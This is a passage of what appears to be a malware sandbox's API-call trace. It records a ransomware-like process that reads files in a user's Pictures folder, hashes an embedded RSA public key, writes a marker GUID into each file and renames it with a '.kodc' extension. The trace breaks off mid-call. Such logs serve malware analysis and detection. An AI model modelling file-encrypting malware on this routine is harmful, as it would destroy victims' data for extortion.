ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x10d04, lpOverlapped=0x0) returned 1 [0099.753] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.754] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.754] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.754] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.755] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.755] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.755] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.755] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.755] GetLastError () returned 0x0 [0099.755] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.755] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.755] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.755] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.755] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10d00) returned 0x9bb8968 [0099.756] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9be78 [0099.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7980 [0099.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bec0 [0099.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7998 [0099.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79b0 [0099.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0099.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79e0 [0099.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.756] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79b0 | out: hHeap=0x630000) returned 1 [0099.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79e0 | out: hHeap=0x630000) returned 1 [0099.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0099.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0099.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0099.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79e0 [0099.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0099.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb79b0 [0099.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0099.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0099.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0099.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79e0 | out: hHeap=0x630000) returned 1 [0099.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79b0 | out: hHeap=0x630000) returned 1 [0099.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0099.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.757] GetCurrentThreadId () returned 0x42c [0099.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba5c48 [0099.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.757] GetCurrentThreadId () returned 0x42c [0099.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.758] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10d04, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.758] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.758] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.758] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.758] CloseHandle (hObject=0x5cc) returned 1 [0099.760] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\R6HVEfAHabx.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\r6hvefahabx.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\R6HVEfAHabx.png.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\r6hvefahabx.png.kodc")) returned 1 [0099.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.760] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.762] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5381afa0, ftCreationTime.dwHighDateTime=0x1d5b58a, ftLastAccessTime.dwLowDateTime=0xd60f7570, ftLastAccessTime.dwHighDateTime=0x1d5b9ee, ftLastWriteTime.dwLowDateTime=0xd60f7570, ftLastWriteTime.dwHighDateTime=0x1d5b9ee, nFileSizeHigh=0x0, nFileSizeLow=0xe761, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sedQsW54hh3wTvzgi.gif", cAlternateFileName="SEDQSW~1.GIF")) returned 1 [0099.762] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\sedQsW54hh3wTvzgi.gif") returned=".gif" [0099.762] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\sedQsW54hh3wTvzgi.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sedqsw54hh3wtvzgi.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.762] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=59233) returned 1 [0099.762] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.765] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe73b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.765] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.766] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.766] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xe761, lpOverlapped=0x0) returned 1 [0099.766] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.766] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.766] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.767] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0099.767] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.767] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.767] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.767] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.768] GetLastError () returned 0x0 [0099.768] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.768] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0099.768] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.768] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.768] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.768] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.768] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe760) returned 0x9ba6d90 [0099.768] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.768] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bec0 [0099.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7998 [0099.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bf08 [0099.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79f8 [0099.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79e0 [0099.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0099.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a58 [0099.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.769] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79e0 | out: hHeap=0x630000) returned 1 [0099.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a58 | out: hHeap=0x630000) returned 1 [0099.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0099.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0099.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0099.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a58 [0099.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0099.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb79e0 [0099.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0099.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0099.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0099.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a58 | out: hHeap=0x630000) returned 1 [0099.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79e0 | out: hHeap=0x630000) returned 1 [0099.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0099.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.770] GetCurrentThreadId () returned 0x42c [0099.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba5cd8 [0099.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0099.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.771] GetCurrentThreadId () returned 0x42c [0099.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: 